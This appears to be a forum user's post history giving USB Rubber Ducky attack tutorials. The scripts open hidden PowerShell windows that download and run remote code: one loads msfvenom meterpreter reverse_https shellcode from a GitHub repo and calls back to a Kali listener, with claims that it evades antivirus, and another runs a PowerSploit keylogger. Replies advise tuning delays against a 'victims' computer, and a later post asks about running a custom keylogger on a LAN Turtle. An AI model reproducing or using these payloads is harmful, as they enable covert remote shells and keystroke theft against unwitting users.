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Posts posted by GunZofPeace

  1. 5 hours ago, kbeflo said:

    Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice.

    So for this script I have the DELAY numbers quite high. it all depends on the computer specs, like how fast it is able to start up powershell, enter the commands, etc. Try lowering the DELAY numbers by half. It improves the speed greatly! Just test the script with different DELAYs and see how fast you can get your computer (or victims) computer to run the commands. Try putting 250 for the first four DELAYs. That should run it a lot quicker!

  2. 5 hours ago, henna3 said:

    Nice script man!, quick question

    Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 


    I'm not sure. I don't see why you would do that though if the shellcode already gives you a meterpreter shell. I think the .exe has to be able to be converted into a powershell format, but google it! Sorry I can't help you with this

  3. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we?

    Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code:

    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt

    The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. 

    STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer).

    Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that!

    STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines.


    DELAY 500
    GUI x
    DELAY 1000
    DELAY 1000
    ALT y
    DELAY 1000
    STRING powershell -WindowStyle hidden 
    DELAY 1000
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
    DELAY 1000
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp')
    DELAY 1000
    STRING Invoke-Shellcode -Shellcode ($buf) -Force



    What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code.


    To set up the listener, open up a terminal in Kali.


    >use exploit/multi/handler

    >set payload windows/x64/meterpreter/reverse_https

    >set LHOST XXX (whatever IP you used, which would be your kali machine IP)

    >set LPORT XXX (whatever port you used)



    And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.


  4. Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. 

    Here is the code:


    DELAY 500
    GUI r
    DELAY 50
    STRING powershell -WindowStyle hidden
    DELAY 100
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    DELAY 300
    STRING Get-Keystrokes -LogPath C:\Users\Garrett\Desktop\testing123.txt -Timeout 1



    Of course, go to the www.ducktoolkit.com and encode it. Comment any suggestions / thoughts! I will be posting more scripts as I go. Also, I am working on a script to email the keylog file to your email. Will upload once I get that working. Hope you enjoy!

    • Upvote 1
  5. Once I deploy the LAN Turtle, SSH into it using my own VPS, is it possible to run my own custom python scripts using the LAN turtle terminal. 

    For example:

    I write my own python keylogger script and SCP it onto my LAN Turtle. Is there a way to run this?

    I'm unsure if this will work as this is connected via ethernet, not necessarily a normal USB stick.

    Thanks for your time.

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